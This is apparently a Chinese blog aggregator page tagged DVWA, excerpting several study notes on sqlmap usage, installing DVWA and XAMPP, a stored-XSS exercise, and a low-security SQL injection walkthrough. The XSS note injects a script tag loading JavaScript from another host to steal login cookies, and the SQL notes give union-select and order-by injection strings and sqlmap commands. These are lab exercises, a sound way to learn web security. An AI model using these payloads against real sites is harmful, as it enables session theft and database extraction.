dvwa

Sqlmap学习笔记(一)

こ雲淡風輕ζ 提交于 2019-12-21 09:19:22
Sqlmap安装 进入 sqlmap官网 ,下载,运行sqlmap.py文件即可 python sqlmap.py 通过pip安装 pip install sqlmap 直接在命令行运行sqlmap即可 Sqlmap直连数据库 sqlmap -d mysql://root:root@localhost:3306/test -f --banner ​ 如果报错需要下载pymysql模块 pip install pymsql ​ -d:直连数据库,后面跟着连接信息 -> mysql://用户名:密码@主机名:端口/数据库 ​ -f:打印DBMS信息 ​ --banner:打印banner信息,准确的版本号 ​ 成功访问,获取mysql信息 [23:47:45] [INFO] connection to MySQL server 'localhost:3306' established [23:47:45] [INFO] testing MySQL [23:47:45] [INFO] resumed: [['1']]... [23:47:45] [INFO] confirming MySQL [23:47:45] [INFO] resumed: [['1']]... [23:47:45] [INFO] the back-end DBMS is MySQL [23:47:45] [INFO

Minor Record 1 安装DVWA

耗尽温柔 提交于 2019-12-16 07:16:20
DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,它的主要目标是帮助安全专业人员在合法环境中测试他们的技能和工具,帮助web开发人员更好地理解保护web应用程序的过程。共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAPTCHA (不安全的验证码) SQL Injection(SQL注入) SQL Injection(Blind)(SQL盲注) XSS(Reflected)(反射型跨站脚本) XSS(Stored)(存储型跨站脚本) 安装教程 我是在B站上看视频搭建的,感觉视频质量还是挺不错的,可以去那里学(我就不图文教程了) 相关工具 PHPStudy 这个比较简单好找,我根据视频选择了2016版本的,附上链接: PHP中文网 phpstudy2016 稳定版本 DVWA这个安装包当时没下好,可能是因为网络问题,下载界面一直没弹出来。第二天回去试了下,发现可以下载了,官网链接: DVWA官网 如果你也出现了跟我一样的问题,我也顺便提供了网盘链接 URL: https://pan.baidu.com/s

SQL注入之SQLmap入门

情到浓时终转凉″ 提交于 2019-12-13 17:00:00
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 读者可以通过位于SourceForge的官方网站下载SQLmap源码: http://sourceforge.net/projects/sqlmap/ SQLmap的作者是谁? Bernardo DameleAssumpcao Guimaraes (@inquisb),读者可以通过 bernardo@sqlmap.org 与他取得联系,以及Miroslav Stampar (@stamparm)读者可以通过 miroslav@sqlmap.org 与他联系。 同时读者也可以通过dev@sqlmap.org与SQLmap的所有开发者联系。 执行SQLmap的命令是什么? 进入sqlmap.py所在的目录,执行以下命令: #python sqlmap.py -h (译注:选项列表太长了,而且与最新版本有些差异,所以这里不再列出,请读者下载最新版在自己机器上看吧) SQLmap命令选项被归类为目标(Target)选项、请求(Request)选项、优化、注入、检测、技巧(Techniques)、指纹、枚举等。 如何使用SQLmap: 为方便演示

SQL注入之SQLmap入门(转自freebuf)

本小妞迷上赌 提交于 2019-12-13 14:06:06
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 具体见: http://www.freebuf.com/articles/web/29942.html 用户手册: http://drops.wooyun.org/tips/143 http://drops.wooyun.org/tips/401 什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 读者可以通过位于SourceForge的官方网站下载SQLmap源码: http://sourceforge.net/projects/sqlmap/ SQLmap的作者是谁? Bernardo DameleAssumpcao Guimaraes (@inquisb),读者可以通过 bernardo@sqlmap.org 与他取得联系,以及Miroslav Stampar (@stamparm)读者可以通过 miroslav@sqlmap.org 与他联系。 同时读者也可以通过dev@sqlmap.org与SQLmap的所有开发者联系。 执行SQLmap的命令是什么? 进入sqlmap.py所在的目录,执行以下命令: #python sqlmap.py -h (译注:选项列表太长了

linux如何安装xampp,以及融合dvwa

孤街浪徒 提交于 2019-12-10 03:29:43
1、官网下载:https://www.apachefriends.org/download.html 2、赋予执行权限 [admin@19-56 ~]$ chmod +x xampp-linux-x64-7.1.7-0-installer.run 3、安装,根据向导选择,默认安装路径为/opt/lampp 4、进入路径/opt/lampp,启动软件 ./xmapp 5、启动时若遇到问题,参考http://www.cnblogs.com/shengulong/p/7262346.html 6、远程访问phpMyAdmin,参考其本身自带的FAQs;find /opt/ -name httpd-xampp.conf 6、配置: find /opt/ -name config.inc.php修改mysql的登录密码 添加开机启动:ln –s /opt/lampp/xampp /etc/rc.d/init.d/xampp chkconfig –add xampp 卸载xampp /opt/lampp/xampp stop rm -rf /opt/lampp 7、项目放到在/opt/lampp的htdocs文件夹下浏览器输入localhost/项目名即可访问 8、官网下载dvwa:http://www.dvwa.co.uk/ 9、解压后的文件放入到/opt/lampp/htdocs 10

Kali Linux安装dvwa本地shentou测试环境

谁说我不能喝 提交于 2019-12-09 15:47:34
本地shentou测试环境 在学习网络安全中,常常没有真实实验环境帮助自己动手提升技术能力,而本地shentou测试环境就为大家带来了便利。本地shentou测试环境:搭建于本地来进行shentou测试的环境,通常是以网站,系统环境来做shentou测试。 DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序,包含了SQL注入、XSS、远程命令执行等常见的一些安全漏洞。 搭建 下载dvwa git clone https://github.com/ethicalhack3r/DVWA 下载好后将DVWA文件移动到/var/www/html/下 cp -r DVWA/ /var/www/html/ cd /var/www/html/ 给DVWA文件夹权限 chmod 777 -R DVWA/ (-R是递归,也就是所有文件全部修改为777权限) 启动mysql数据库和Apache service apache2 start service mysql start 我们可以用netstat命令来查看是否开启 netstat -anpt | grep 80 netstat -anpt | grep 3306 登录mysql进行授权 mysql -u root

Web安全测试学习笔记 - 存储型XSS

别说谁变了你拦得住时间么 提交于 2019-12-06 11:42:17
XSS(Cross-Site Scripting) 大致分为反射型和存储型两种,之前对XSS的认知仅停留在如果网站输入框没有屏蔽类似<script>alert('ok')</script>的代码,那么这个网站就有被XSS攻击的风险,到底有什么风险呢?又是怎么被攻击的呢?sorry,我也不知道>_< 我用DVWA来练习存储型XSS,目标是窃取用户账号(通过拿到对方的登录cookie)。我在本机再开一台虚拟机,用虚拟机(模拟另一个用户)访问: http://IP地址/dvwa/vulnerabilities/xss_s/ 。这个页面是不是很像留言或者评论页面~ security level = low 1. 在本机登录(模拟攻击方), 输入时发现Name做了长度限制,而Message没有,所以攻击点在Message的输入框 输入:<script src="http://172.24.107.155/test.js"></script> 刷新一下当前页面,刚插入的记录仍然存在,说明恶意代码已经被“ 存储 ”在这个页面了~ 2. 在本机的php服务下放入js代码文件和php文件。 js文件用来在被攻击方采集cookie并传入php页面,php页面将cookie存入名为cookies的文件中。 test.js文件内容: var img = document.createElement(

Sqlmap学习笔记(二)

一世执手 提交于 2019-12-06 08:56:50
Sqlmap设置Http请求参数 ​ --cookie:指定cookie信息,用来代理登陆状态,如果站点目标URL需要登陆之后才能访问,那么在使用sqlmap对目标URL进行扫描时需要将登陆后的cookie一并带过去,不然sqlmap的扫描有可能会被重定向到登陆页面,或者没有访问该接口的权限 ​ --method:指定http请求方式,如POST、GET、DELETE、PUT等 ​ --data:POST请求所携带的参数,如果指定了这个选项,那么请求方式默认是POST ​ --param-del:GET或POST参数默认分隔符,默认是&,如果设置成“,”,那么GET参数格式为 ​ ?id=1;name=张三 , ​ POST请求方式需要通过配合--data选项来设置 ​ --data="id=1;name=张三" ​ --level: 测试的安全等级(1-5, 默认1),值越大,扫描深度越大 ​ -p:要测试的参数 ​ 如要扫描的url为: http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit# 可以只扫描id参数,通过-p指定,多个字段用逗号分隔 sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie

dvwa-sql injection

强颜欢笑 提交于 2019-12-06 06:47:19
因为之前为了my,去教了ctf进阶(不是因为我学的多,只是因为我是大三的),总结了一份PPT,对sql手工注入的过程以及sql各种高级注入都了解了一些,个人感觉还是挺熟的 写的较为简略,给自己参考的 0x00、简介 sql注入,简单的来说就是对用户输入的数据没有进行查询,导致用户输入恶意语句,构造一些可以被执行的sql语句,导致数据库被拖等严重后果 0x01、dvwa实战 一、low 1、判断是否为注入点和注入点类型 输入:1' and '1' ='1'#:  (#表示注释掉后面的) 输入:1' and '1' ='2',无回显 可判断该点为注入点,且参数闭合方式为单引号闭合 2、跟据 order by 判断字段长度 order by n,若字段n不存在会报错,输入 1' order by 2 #: 输入1' order by 3 #: 说明查询语句所查的表个有两个字段 3、利用union select和sql内置函数得到当前数据库名称,版本信息等 union select 要求前后查询的字段一致,所以需要判断当前表的字段长度,输入 -1 ' union select 1,2#可判断回显位置(前面没查询到,显示的自然就是后面查询的了): 既然都回显,我们将内置函数放在任何一个字段都可以,-1' union select database(),2#,查询得到当前数据库名称 4

Sqlmap学习笔记(一)

↘锁芯ラ 提交于 2019-12-06 05:56:46
Sqlmap安装 进入 sqlmap官网 ,下载,运行sqlmap.py文件即可 python sqlmap.py 通过pip安装 pip install sqlmap 直接在命令行运行sqlmap即可 Sqlmap直连数据库 sqlmap -d mysql://root:root@localhost:3306/test -f --banner ​ 如果报错需要下载pymysql模块 pip install pymsql ​ -d:直连数据库,后面跟着连接信息 -> mysql://用户名:密码@主机名:端口/数据库 ​ -f:打印DBMS信息 ​ --banner:打印banner信息,准确的版本号 ​ 成功访问,获取mysql信息 [23:47:45] [INFO] connection to MySQL server 'localhost:3306' established [23:47:45] [INFO] testing MySQL [23:47:45] [INFO] resumed: [['1']]... [23:47:45] [INFO] confirming MySQL [23:47:45] [INFO] resumed: [['1']]... [23:47:45] [INFO] the back-end DBMS is MySQL [23:47:45] [INFO